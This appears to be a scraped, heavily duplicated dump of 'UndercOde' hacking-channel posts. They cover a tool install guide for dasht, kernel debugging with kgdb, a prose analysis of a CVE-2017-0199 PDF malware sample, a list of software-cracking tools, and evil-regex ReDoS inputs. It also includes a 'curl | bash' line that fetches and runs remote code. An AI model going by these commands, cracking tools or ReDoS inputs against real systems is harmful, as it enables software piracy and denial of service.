β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated 2019 Search API docs offline, in terminal or browser :
>dasht is a collection of shell scripts for searching, browsing, and managing API documentation (in the form of 150+ offline documentation sets, courtesy of Dash for OS X) all from the comfort of your own terminal!
T.me/UndercOdeTesting
π¦ πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/sunaku/dasht
2) Add the bin/ folder to your PATH environment variable:
3)> export PATH=$PATH:location_where_you_cloned_or_downloaded_dasht/bin
4) Add the man/ folder to your MANPATH environment variable:
> export MANPATH=location_where_you_cloned_or_downloaded_dasht/man:$MANPATH
5) Source this file in ZSH to activate TAB completion for dasht:
>source location_where_you_cloned_or_downloaded_dasht/etc/zsh/completions.zsh
Or simply add the completions/ directory to your ZSH $fpath if you've
already set up ZSH's completion system elsewhere:
> fpath+=location_where_you_cloned_or_downloaded_dasht/etc/zsh/completions/
π¦ TO RUN
1) dasht-docsets-install bash
2) Next, perform a direct search from the terminal using dasht(1):
dasht 'c - x'
3) Then, repeat the search in a web browser using dasht-server(1):
dasht-server
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated 2019 Search API docs offline, in terminal or browser :
>dasht is a collection of shell scripts for searching, browsing, and managing API documentation (in the form of 150+ offline documentation sets, courtesy of Dash for OS X) all from the comfort of your own terminal!
T.me/UndercOdeTesting
π¦ πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/sunaku/dasht
2) Add the bin/ folder to your PATH environment variable:
3)> export PATH=$PATH:location_where_you_cloned_or_downloaded_dasht/bin
4) Add the man/ folder to your MANPATH environment variable:
> export MANPATH=location_where_you_cloned_or_downloaded_dasht/man:$MANPATH
5) Source this file in ZSH to activate TAB completion for dasht:
>source location_where_you_cloned_or_downloaded_dasht/etc/zsh/completions.zsh
Or simply add the completions/ directory to your ZSH $fpath if you've
already set up ZSH's completion system elsewhere:
> fpath+=location_where_you_cloned_or_downloaded_dasht/etc/zsh/completions/
π¦ TO RUN
1) dasht-docsets-install bash
2) Next, perform a direct search from the terminal using dasht(1):
dasht 'c - x'
3) Then, repeat the search in a web browser using dasht-server(1):
dasht-server
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Researchers manage to steal data by manipulating computer screen brightness
Recently from undercode tweets twitter.com/UndercOdeTC
> Computers in government, banks, businesses, industry, and military institutions often operate in a strictly controlled environment, are disconnected from the Internet, and are subject to strict supervision. Although these security measures make them more difficult to crack, several secret channels have been explored in the past, using computer sounds, heat, and even hard drive activity indicators to steal encoded data. The latest attempts include secretly changing the brightness of the display, then capturing video streams with surveillance cameras, and finally decoding through image processing.
> Researchers have been able to extract data from computers by simply changing the brightness level of the computer screen as part of a new type of optically concealed channel that relies on human vision to limit it. According to Hacker News, Dr Mordechai Guri, head of the Cyber ββSecurity Research Center at Ben Gurion University in Israel, conducted the study with two scholars.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Researchers manage to steal data by manipulating computer screen brightness
Recently from undercode tweets twitter.com/UndercOdeTC
> Computers in government, banks, businesses, industry, and military institutions often operate in a strictly controlled environment, are disconnected from the Internet, and are subject to strict supervision. Although these security measures make them more difficult to crack, several secret channels have been explored in the past, using computer sounds, heat, and even hard drive activity indicators to steal encoded data. The latest attempts include secretly changing the brightness of the display, then capturing video streams with surveillance cameras, and finally decoding through image processing.
> Researchers have been able to extract data from computers by simply changing the brightness level of the computer screen as part of a new type of optically concealed channel that relies on human vision to limit it. According to Hacker News, Dr Mordechai Guri, head of the Cyber ββSecurity Research Center at Ben Gurion University in Israel, conducted the study with two scholars.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVE-2017-0199 Vulnerability Exploit Sample Analysis BY UndercOde
instagram.com/UNdercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> md5: 0087AA25E20070186AC171BE6C528DA6
> File size: 31752 bytes (31kb)
> File type: PDF
sample The initial file is disguised as a PDF file, hidden in its PDF data stream segment, a word file, and a JS hidden in its PDF Code. When the PDF is opened, the JS code will be executed. Then, the software that opens the word file by default on the computer will be called to open the word file. Then, if the software that is associated with the computer to open the word file by default is the office in the vulnerability version, it will execute by default Download the malicious link in word. Use PDFstreamDumper to view the data of each segment of this PDF, this is a Word file with embedded data stream segments
π¦ Attack Load
File MD5: AAFD0EBFE1AFBCAE1834430FEEBD5A31
File Type: of Bi nExecute / Microsoft.EXE [: the X86]
> compiled language: NSIS Packer sample description; the sample is The NSIS packaging program. After running the sample, the sample will successively call [collages.dll Corticoid.cab System.dll] ( where System.dl is harmless ) in its resource file, and then call the LoadLibraryExA function to load System.dll after System. dll will continue to call collages.dll address and call LoadLibraryA function to load collages.dll, collages.dll will Corticoid.cab compressed file decryption core sample shellcode decrypt it, then
> collages.dll uses process injection technology to create a child process that injects the decrypted shellcode data into the child process and executes the shellcode to execute malicious code for camouflage purposes. After finding that it is nsis packaged software, use 7-zip to decompress it, and you can see its related resource files. The cab file is a corrupted file, the cabinet compressed file size and its file type and it is suspected to be a shellcode resource file
π¦Note Loaded the resource file, analyzed the two dlls at the beginning, found no malicious code, focused on the cab file, and turned it around for a long time in the packaging program. A lot of time wasted)
by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVE-2017-0199 Vulnerability Exploit Sample Analysis BY UndercOde
instagram.com/UNdercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> md5: 0087AA25E20070186AC171BE6C528DA6
> File size: 31752 bytes (31kb)
> File type: PDF
sample The initial file is disguised as a PDF file, hidden in its PDF data stream segment, a word file, and a JS hidden in its PDF Code. When the PDF is opened, the JS code will be executed. Then, the software that opens the word file by default on the computer will be called to open the word file. Then, if the software that is associated with the computer to open the word file by default is the office in the vulnerability version, it will execute by default Download the malicious link in word. Use PDFstreamDumper to view the data of each segment of this PDF, this is a Word file with embedded data stream segments
π¦ Attack Load
File MD5: AAFD0EBFE1AFBCAE1834430FEEBD5A31
File Type: of Bi nExecute / Microsoft.EXE [: the X86]
> compiled language: NSIS Packer sample description; the sample is The NSIS packaging program. After running the sample, the sample will successively call [collages.dll Corticoid.cab System.dll] ( where System.dl is harmless ) in its resource file, and then call the LoadLibraryExA function to load System.dll after System. dll will continue to call collages.dll address and call LoadLibraryA function to load collages.dll, collages.dll will Corticoid.cab compressed file decryption core sample shellcode decrypt it, then
> collages.dll uses process injection technology to create a child process that injects the decrypted shellcode data into the child process and executes the shellcode to execute malicious code for camouflage purposes. After finding that it is nsis packaged software, use 7-zip to decompress it, and you can see its related resource files. The cab file is a corrupted file, the cabinet compressed file size and its file type and it is suspected to be a shellcode resource file
π¦Note Loaded the resource file, analyzed the two dlls at the beginning, found no malicious code, focused on the cab file, and turned it around for a long time in the packaging program. A lot of time wasted)
by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦JavaScript has npm, Ruby has Gems, Python has pip and now Shell has bpkg, automated 2020 updated script for kali-debian-ubanto
instagram.com/UndercOdeTestingCompany
π¦ πβπππΈπππππΈπππβ & βπβ:
1) curl -Lo- "https://raw.githubusercontent.com/bpkg/bpkg/master/setup.sh" | bash
2) clib install bpkg/bpkg
π¦ 1) git clone https://github.com/bpkg/bpkg.git
2) cd bpkg
3) ./setup.sh # Will install bpkg in $HOME/.local/bin
4) sudo ./setup.sh # Will install bpkg in /usr/local/bin.
5) PREFIX=/my/custom/directory ./setup.sh # Will install bpkg in a custom directory.
6) global install for the current user
> $ bpkg install term -g
7) term
8) local install:
> $ bpkg install term
> $ ./deps/term/term.sh
9) After a local install the term.sh script is copied as term to the deps/bin directory, you can add this directory to the PATH with
> export PATH=$PATH:/path_to_bkpg/deps/bin
As a bonus, you can specify a specific version:
> $ bpkg install jwerle/suggest.sh@0.0.1 -g
10) For example you could install git-standup with an omitted package.json because of the Makefile and the install target found in it.
$ bpkg install stephenmathieson/git-standup -g
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦JavaScript has npm, Ruby has Gems, Python has pip and now Shell has bpkg, automated 2020 updated script for kali-debian-ubanto
instagram.com/UndercOdeTestingCompany
π¦ πβπππΈπππππΈπππβ & βπβ:
1) curl -Lo- "https://raw.githubusercontent.com/bpkg/bpkg/master/setup.sh" | bash
2) clib install bpkg/bpkg
π¦ 1) git clone https://github.com/bpkg/bpkg.git
2) cd bpkg
3) ./setup.sh # Will install bpkg in $HOME/.local/bin
4) sudo ./setup.sh # Will install bpkg in /usr/local/bin.
5) PREFIX=/my/custom/directory ./setup.sh # Will install bpkg in a custom directory.
6) global install for the current user
> $ bpkg install term -g
7) term
8) local install:
> $ bpkg install term
> $ ./deps/term/term.sh
9) After a local install the term.sh script is copied as term to the deps/bin directory, you can add this directory to the PATH with
> export PATH=$PATH:/path_to_bkpg/deps/bin
As a bonus, you can specify a specific version:
> $ bpkg install jwerle/suggest.sh@0.0.1 -g
10) For example you could install git-standup with an omitted package.json because of the Makefile and the install target found in it.
$ bpkg install stephenmathieson/git-standup -g
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - bpkg/bpkg: Lightweight bash package manager
Lightweight bash package manager. Contribute to bpkg/bpkg development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The "Reverse Resource Zone"- and required tools for Cracking Softwares by UNdercOde
t.me/UndercOdeTesting
> [ Android Tools ] Relevant tools used by Android program reverse
> [ Debuggers ] Dynamic debugging tools
> [ Disassemblers ] Decompiler tools (static analysis (Main)
> [ PEtools ] PE file analysis and shell checking related tools
> [ Packers ] Shell related tools
> [ Patchers ] Patch related tools
> [ Editors ] Program resource editing, text manipulation related tools
> [ Cryptography ] Algorithm related tools
> [Unpackers ] Shelling machine related
> [ Dongle ] Dongle related
> [ .NET ] Microsoft .Net program reverse related tool
> [ OllyScript ] OllyDbg shelling script, program button event lookup script
> [ OllyDbg 1.x Plugin ] Dynamic debugging tool OllyDbg 1. Plug-in program for x
> [ OllyDbg 2.x Plugin ] Plug-in program for OllyDbg 2.x
> [ x64dbg Plugin ] Plug-in program for dynamic debugging tool x64dbg
> [ IDA Plugin ] Plug-in program for decompiler IDA
> [ Mac OSX ] Mac OSX system Program Reverse Related Tools
> [ Other ] Other related programs
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The "Reverse Resource Zone"- and required tools for Cracking Softwares by UNdercOde
t.me/UndercOdeTesting
> [ Android Tools ] Relevant tools used by Android program reverse
> [ Debuggers ] Dynamic debugging tools
> [ Disassemblers ] Decompiler tools (static analysis (Main)
> [ PEtools ] PE file analysis and shell checking related tools
> [ Packers ] Shell related tools
> [ Patchers ] Patch related tools
> [ Editors ] Program resource editing, text manipulation related tools
> [ Cryptography ] Algorithm related tools
> [Unpackers ] Shelling machine related
> [ Dongle ] Dongle related
> [ .NET ] Microsoft .Net program reverse related tool
> [ OllyScript ] OllyDbg shelling script, program button event lookup script
> [ OllyDbg 1.x Plugin ] Dynamic debugging tool OllyDbg 1. Plug-in program for x
> [ OllyDbg 2.x Plugin ] Plug-in program for OllyDbg 2.x
> [ x64dbg Plugin ] Plug-in program for dynamic debugging tool x64dbg
> [ IDA Plugin ] Plug-in program for decompiler IDA
> [ Mac OSX ] Mac OSX system Program Reverse Related Tools
> [ Other ] Other related programs
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why do you need to debug the linux kernel ?
t.me/UndercOdeTesting
> if you want to take this opportunity to sort out the file system.
> sdcardfs Although the amount of code is not very large, but for my current familiarity with Linux source code, there are still some difficulties.
> So you need to be able to debug with breakpoints to track the execution flow of the kernel. Through breakpoint debugging, you can view the value of the variable and the call stack.
> Sharpening the wood without accidentally cutting the woodworker, breakpoint debugging can be more effective for analyzing the kernel source code.
@UndercOdeofficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why do you need to debug the linux kernel ?
t.me/UndercOdeTesting
> if you want to take this opportunity to sort out the file system.
> sdcardfs Although the amount of code is not very large, but for my current familiarity with Linux source code, there are still some difficulties.
> So you need to be able to debug with breakpoints to track the execution flow of the kernel. Through breakpoint debugging, you can view the value of the variable and the call stack.
> Sharpening the wood without accidentally cutting the woodworker, breakpoint debugging can be more effective for analyzing the kernel source code.
@UndercOdeofficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦debugg Using kgdb, kdb and the kernel debugger internals
t.me/UndercodeTesting
1) The kernel has two different debugger front ends (kdb and kgdb) which interface to the debug core. It is possible to use either of the debugger front ends and dynamically transition between them if you configure the kernel properly at compile and runtime.
2) Kdb is simplistic shell-style interface which you can use on a system console with a keyboard or serial console. You can use it to inspect memory, registers, process lists, dmesg, and even set breakpoints to stop in a certain location. Kdb is not a source level debugger, although you can set breakpoints and execute some basic kernel run control. Kdb is mainly aimed at doing some analysis to aid in development or diagnosing kernel problems. You can access some symbols by name in kernel built-ins or in kernel modules if the code was built with CONFIG_KALLSYMS.
3) Kgdb is intended to be used as a source level debugger for the Linux kernel.
4 It is used along with gdb to debug a Linux kernel. The expectation is that gdb can be used to βbreak inβ to the kernel to inspect memory, variables and look through call stack information similar to the way an application developer would use gdb to debug an application. It is possible to place breakpoints in kernel code and perform some limited execution stepping.
π¦ Requirements :
>Two machines are required for using kgdb.
1) One of these machines is a development machine and the other is the target machine.
2) The kernel to be debugged runs on the target machine. The development machine runs an instance of gdb against the vmlinux file which contains the symbols (not a boot image such as bzImage, zImage, uImage...). In gdb the developer specifies the connection parameters and connects to kgdb.
3) The type of connection a developer makes with gdb depends on the availability of kgdb I/O modules compiled as built-ins or loadable kernel modules in the test machineβs kernel.
π¦ Compiling a kernel
> In order to enable compilation of kdb, you must first enable kgdb
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦debugg Using kgdb, kdb and the kernel debugger internals
t.me/UndercodeTesting
1) The kernel has two different debugger front ends (kdb and kgdb) which interface to the debug core. It is possible to use either of the debugger front ends and dynamically transition between them if you configure the kernel properly at compile and runtime.
2) Kdb is simplistic shell-style interface which you can use on a system console with a keyboard or serial console. You can use it to inspect memory, registers, process lists, dmesg, and even set breakpoints to stop in a certain location. Kdb is not a source level debugger, although you can set breakpoints and execute some basic kernel run control. Kdb is mainly aimed at doing some analysis to aid in development or diagnosing kernel problems. You can access some symbols by name in kernel built-ins or in kernel modules if the code was built with CONFIG_KALLSYMS.
3) Kgdb is intended to be used as a source level debugger for the Linux kernel.
4 It is used along with gdb to debug a Linux kernel. The expectation is that gdb can be used to βbreak inβ to the kernel to inspect memory, variables and look through call stack information similar to the way an application developer would use gdb to debug an application. It is possible to place breakpoints in kernel code and perform some limited execution stepping.
π¦ Requirements :
>Two machines are required for using kgdb.
1) One of these machines is a development machine and the other is the target machine.
2) The kernel to be debugged runs on the target machine. The development machine runs an instance of gdb against the vmlinux file which contains the symbols (not a boot image such as bzImage, zImage, uImage...). In gdb the developer specifies the connection parameters and connects to kgdb.
3) The type of connection a developer makes with gdb depends on the availability of kgdb I/O modules compiled as built-ins or loadable kernel modules in the test machineβs kernel.
π¦ Compiling a kernel
> In order to enable compilation of kdb, you must first enable kgdb
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Lets start android debugging 2020
> Kernel config options for kgdb
fb.com/UndercOdeTestingCompany
1) To enable CONFIG_KGDB you should look under Kernel hacking β£ Kernel debugging and select KGDB: kernel debugger.
2) While it is not a hard requirement that you have symbols in your vmlinux file, gdb tends not to be very useful without the symbolic data, so you will want to turn on CONFIG_DEBUG_INFO which is called Compile the kernel with debug info in the config menu.
3) It is advised, but not required, that you turn on the CONFIG_FRAME_POINTER kernel option which is called Compile the kernel with frame pointers in the config menu.
4) This option inserts code to into the compiled executable which saves the frame information in registers or on the stack at different points which allows a debugger such as gdb to more accurately construct stack back traces while debugging the kernel.
5) If the architecture that you are using supports the kernel option CONFIG_STRICT_KERNEL_RWX, you should consider turning it off.
6) This option will prevent the use of software breakpoints because it marks certain regions of the kernelβs memory space as read-only. If kgdb supports it for the architecture you are using, you can use hardware breakpoints if you desire to run with the CONFIG_STRICT_KERNEL_RWX option turned on, else you need to turn off this option.
7) Next you should choose one of more I/O drivers to interconnect debugging host and debugged target. Early boot debugging requires a KGDB I/O driver that supports early debugging and the driver must be built into the kernel directly. Kgdb I/O driver configuration takes place via kernel or module parameters
π¦ Here is an example set of .config symbols to enable or disable for kgdb:
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
Kernel config options for kdb
Kdb is quite a bit more complex than the simple gdbstub sitting on top of the kernelβs debug core. Kdb must implement a shell, and also adds some helper functions in other parts of the kernel, responsible for printing out interesting data such as what you would see if you ran lsmod, or ps.
8) In order to build kdb into the kernel you follow the same steps as you would for kgdb.
9) The main config option for kdb is CONFIG_KGDB_KDB which is called KGDB_KDB: include kdb frontend for kgdb in the config menu. In theory you would have already also selected an I/O driver such as the CONFIG_KGDB_SERIAL_CONSOLE interface if you plan on using kdb on a serial port, when you were configuring kgdb.
10) If you want to use a PS/2-style keyboard with kdb, you would select CONFIG_KDB_KEYBOARD which is called KGDB_KDB: keyboard as input device in the config menu. The CONFIG_KDB_KEYBOARD option is not used for anything in the gdb interface to kgdb. The CONFIG_KDB_KEYBOARD option only works with kdb.
11) Here is an example set of .config symbols to enable/disable kdb:
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y
Kernel Debugger Boot Arguments
This section describes the various runtime kernel parameters that affect the configuration of the kernel debugger. T
12) Kernel parameter: kgdboc
The kgdboc driver was originally an abbreviation meant to stand for βkgdb over consoleβ. Today it is the primary mechanism to configure how to communicate from gdb to kgdb as well as the devices you want to use to interact with the kdb shell.
13) For kgdb/gdb, kgdboc is designed to work with a single serial port. It is intended to cover the circumstance where you want to use a serial console as your primary console as well as using it to perform kernel debugging. It is also possible to use kgdb on a serial port which is not designated as a system console. Kgdboc may be configured as a kernel built-in or a kernel loadable module.
14) You can only make use of kgdbwait and early debugging if you build kgdboc into the kernel as a built-in.
π¦ Lets start android debugging 2020
> Kernel config options for kgdb
fb.com/UndercOdeTestingCompany
1) To enable CONFIG_KGDB you should look under Kernel hacking β£ Kernel debugging and select KGDB: kernel debugger.
2) While it is not a hard requirement that you have symbols in your vmlinux file, gdb tends not to be very useful without the symbolic data, so you will want to turn on CONFIG_DEBUG_INFO which is called Compile the kernel with debug info in the config menu.
3) It is advised, but not required, that you turn on the CONFIG_FRAME_POINTER kernel option which is called Compile the kernel with frame pointers in the config menu.
4) This option inserts code to into the compiled executable which saves the frame information in registers or on the stack at different points which allows a debugger such as gdb to more accurately construct stack back traces while debugging the kernel.
5) If the architecture that you are using supports the kernel option CONFIG_STRICT_KERNEL_RWX, you should consider turning it off.
6) This option will prevent the use of software breakpoints because it marks certain regions of the kernelβs memory space as read-only. If kgdb supports it for the architecture you are using, you can use hardware breakpoints if you desire to run with the CONFIG_STRICT_KERNEL_RWX option turned on, else you need to turn off this option.
7) Next you should choose one of more I/O drivers to interconnect debugging host and debugged target. Early boot debugging requires a KGDB I/O driver that supports early debugging and the driver must be built into the kernel directly. Kgdb I/O driver configuration takes place via kernel or module parameters
π¦ Here is an example set of .config symbols to enable or disable for kgdb:
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
Kernel config options for kdb
Kdb is quite a bit more complex than the simple gdbstub sitting on top of the kernelβs debug core. Kdb must implement a shell, and also adds some helper functions in other parts of the kernel, responsible for printing out interesting data such as what you would see if you ran lsmod, or ps.
8) In order to build kdb into the kernel you follow the same steps as you would for kgdb.
9) The main config option for kdb is CONFIG_KGDB_KDB which is called KGDB_KDB: include kdb frontend for kgdb in the config menu. In theory you would have already also selected an I/O driver such as the CONFIG_KGDB_SERIAL_CONSOLE interface if you plan on using kdb on a serial port, when you were configuring kgdb.
10) If you want to use a PS/2-style keyboard with kdb, you would select CONFIG_KDB_KEYBOARD which is called KGDB_KDB: keyboard as input device in the config menu. The CONFIG_KDB_KEYBOARD option is not used for anything in the gdb interface to kgdb. The CONFIG_KDB_KEYBOARD option only works with kdb.
11) Here is an example set of .config symbols to enable/disable kdb:
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y
Kernel Debugger Boot Arguments
This section describes the various runtime kernel parameters that affect the configuration of the kernel debugger. T
12) Kernel parameter: kgdboc
The kgdboc driver was originally an abbreviation meant to stand for βkgdb over consoleβ. Today it is the primary mechanism to configure how to communicate from gdb to kgdb as well as the devices you want to use to interact with the kdb shell.
13) For kgdb/gdb, kgdboc is designed to work with a single serial port. It is intended to cover the circumstance where you want to use a serial console as your primary console as well as using it to perform kernel debugging. It is also possible to use kgdb on a serial port which is not designated as a system console. Kgdboc may be configured as a kernel built-in or a kernel loadable module.
14) You can only make use of kgdbwait and early debugging if you build kgdboc into the kernel as a built-in.
Optionally you can elect to activate kms (Kernel Mode Setting) integration. When you use kms with kgdboc and you have a video driver that has atomic mode setting hooks, it is possible to enter the debugger on the graphics console. When the kernel execution is resumed, the previous graphics mode will be restored. This integration can serve as a useful tool to aid in diagnosing crashes or doing analysis of memory with kdb while allowing the full graphics console applications to run.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Details for android debugg
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
a) kgdboc arguments
1) kgdboc=[kms][[,]kbd][[,]serial_device][,baud]
The order listed above must be observed if you use any of the optional configurations together.
Abbreviations:
kms = Kernel Mode Setting
kbd = Keyboard
You can configure kgdboc to use the keyboard, and/or a serial device depending on if you are using kdb and/or kgdb, in one of the following scenarios. The order listed above must be observed if you use any of the optional configurations together. Using kms + only gdb is generally not a useful combination.
2) Using loadable module or built-in
As a kernel built-in:
> Use the kernel boot argument:
kgdboc=<tty-device>,[baud]
As a kernel loadable module:
π¦ Use the command:
modprobe kgdboc kgdboc=<tty-device>,[baud]
Here are two examples of how you might format the kgdboc string. The first is for an x86 target using the first serial port. The second example is for the ARM Versatile AB using the second serial port.
kgdboc=ttyS0,115200
kgdboc=ttyAMA1,115200
Configure kgdboc at runtime with sysfs
At run time you can enable or disable kgdboc by echoing a parameters into the sysfs. Here are two examples:
π¦ Enable/disable
kgdboc on ttyS0:
1) enable :
> echo ttyS0 > /sys/module/kgdboc/parameters/kgdboc
2) Disable kgdboc:
> echo "" > /sys/module/kgdboc/parameters/kgdboc
π¦ More examples by UndercOde
1) You can configure kgdboc to use the keyboard, and/or a serial device depending on if you are using kdb and/or kgdb, in one of the following scenarios.
> kdb and kgdb over only a serial port:
kgdboc=<serial_device>[,baud]
2) Example:
kgdboc=ttyS0,115200
kdb and kgdb with keyboard and a serial port:
kgdboc=kbd,<serial_device>[,baud]
3) Example:
kgdboc=kbd,ttyS0,115200
kdb with a keyboard:
kgdboc=kbd
kdb with kernel mode setting:
kgdboc=kms,kbd
kdb with kernel mode setting and kgdb over a serial port:
kgdboc=kms,kbd,ttyS0,115200
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Details for android debugg
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
a) kgdboc arguments
1) kgdboc=[kms][[,]kbd][[,]serial_device][,baud]
The order listed above must be observed if you use any of the optional configurations together.
Abbreviations:
kms = Kernel Mode Setting
kbd = Keyboard
You can configure kgdboc to use the keyboard, and/or a serial device depending on if you are using kdb and/or kgdb, in one of the following scenarios. The order listed above must be observed if you use any of the optional configurations together. Using kms + only gdb is generally not a useful combination.
2) Using loadable module or built-in
As a kernel built-in:
> Use the kernel boot argument:
kgdboc=<tty-device>,[baud]
As a kernel loadable module:
π¦ Use the command:
modprobe kgdboc kgdboc=<tty-device>,[baud]
Here are two examples of how you might format the kgdboc string. The first is for an x86 target using the first serial port. The second example is for the ARM Versatile AB using the second serial port.
kgdboc=ttyS0,115200
kgdboc=ttyAMA1,115200
Configure kgdboc at runtime with sysfs
At run time you can enable or disable kgdboc by echoing a parameters into the sysfs. Here are two examples:
π¦ Enable/disable
kgdboc on ttyS0:
1) enable :
> echo ttyS0 > /sys/module/kgdboc/parameters/kgdboc
2) Disable kgdboc:
> echo "" > /sys/module/kgdboc/parameters/kgdboc
π¦ More examples by UndercOde
1) You can configure kgdboc to use the keyboard, and/or a serial device depending on if you are using kdb and/or kgdb, in one of the following scenarios.
> kdb and kgdb over only a serial port:
kgdboc=<serial_device>[,baud]
2) Example:
kgdboc=ttyS0,115200
kdb and kgdb with keyboard and a serial port:
kgdboc=kbd,<serial_device>[,baud]
3) Example:
kgdboc=kbd,ttyS0,115200
kdb with a keyboard:
kgdboc=kbd
kdb with kernel mode setting:
kgdboc=kms,kbd
kdb with kernel mode setting and kgdb over a serial port:
kgdboc=kms,kbd,ttyS0,115200
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Anti-DDOS project is an open source software project developed to protect against DOS and DDoS attacks.
> The project was written using bash programming language. By writing iptables rules into the Linux operating system.
> Takes the necessary defense configurations. And it only works on the linux operating system. 100% compatible for Linux operating systems. It does not provide 100% security, it will only help you to take the necessary measures.
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ:
1) Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/
Anti-DDOS.git
> Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/Anti-DDOS.git
2) cd Anti-DDOS
3) RUN
root@ismailtasdelen:~# bash ./anti-ddos.sh
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Anti-DDOS project is an open source software project developed to protect against DOS and DDoS attacks.
> The project was written using bash programming language. By writing iptables rules into the Linux operating system.
> Takes the necessary defense configurations. And it only works on the linux operating system. 100% compatible for Linux operating systems. It does not provide 100% security, it will only help you to take the necessary measures.
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ:
1) Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/
Anti-DDOS.git
> Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/Anti-DDOS.git
2) cd Anti-DDOS
3) RUN
root@ismailtasdelen:~# bash ./anti-ddos.sh
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦basic commun error fix : win10 denied access [application method]
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> Because the computer system handles the problem of access denied by win10, many people will not operate, so I want to help you solve the problem of access denied by win10, so how should you specifically deal with access denied by win10?
1) Open the C drive, find windowsApps, right-click the property, click the security column, and edit permissions.
2) In the "Group and user name" column, select your current login account, if not, you can add it. (In the add account, select all object types, you can enter the object name, such as -PC / Administrator). Let's take a look at the idea of ββXiao Bian to solve the access denied in win10.
3) Open the C drive, find windowsApps, right-click properties, click the security column, and edit permissions.
4) In the "Group and user name" column, select your current login account, if not, you can add it. (Add account, select all object types, object name can be entered, such as -PC / Administrator)
5) Modify the corresponding permission operations as required
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦basic commun error fix : win10 denied access [application method]
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> Because the computer system handles the problem of access denied by win10, many people will not operate, so I want to help you solve the problem of access denied by win10, so how should you specifically deal with access denied by win10?
1) Open the C drive, find windowsApps, right-click the property, click the security column, and edit permissions.
2) In the "Group and user name" column, select your current login account, if not, you can add it. (In the add account, select all object types, you can enter the object name, such as -PC / Administrator). Let's take a look at the idea of ββXiao Bian to solve the access denied in win10.
3) Open the C drive, find windowsApps, right-click properties, click the security column, and edit permissions.
4) In the "Group and user name" column, select your current login account, if not, you can add it. (Add account, select all object types, object name can be entered, such as -PC / Administrator)
5) Modify the corresponding permission operations as required
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Vulnerable Regex in online repositories Example :
twitter.com/UndercOdeTC
1) ReGexLib,id=1757 (email validation) - see bold part, which is an Evil Regex
^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$
Input:
aaaaaaaaaaaaaaaaaaaaaaaa!
2) OWASP Validation Regex Repository, Java Classname - see bold part, which is an Evil Regex
^(([a-z])+.)+[A-Z]([a-z])+$
Input:
